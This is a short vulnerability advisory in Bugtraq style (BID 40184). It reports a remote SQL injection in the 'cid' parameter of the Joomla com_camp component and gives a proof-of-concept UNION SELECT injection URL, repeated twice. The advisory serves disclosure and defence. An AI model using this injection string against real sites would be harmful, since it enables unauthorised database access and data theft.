Joomla! 'com_camp' Component 'cid' Parameter SQL Injection Vulnerability
BID:40184
Info
Joomla! 'com_camp' Component 'cid' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 40184 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 17 2010 12:00AM |
| Updated: | May 17 2010 12:00AM |
| Credit: | Kernel Security Group |
| Vulnerable: |
Joomla com_camp 0 |
| Not Vulnerable: | |
Exploit / POC
Joomla! 'com_camp' Component 'cid' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?option=com_camp&task=show&cid=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14--
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?option=com_camp&task=show&cid=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14--
References
Joomla! 'com_camp' Component 'cid' Parameter SQL Injection Vulnerability
References:
References:
- Joomla! Extension Homepage (Joomla!)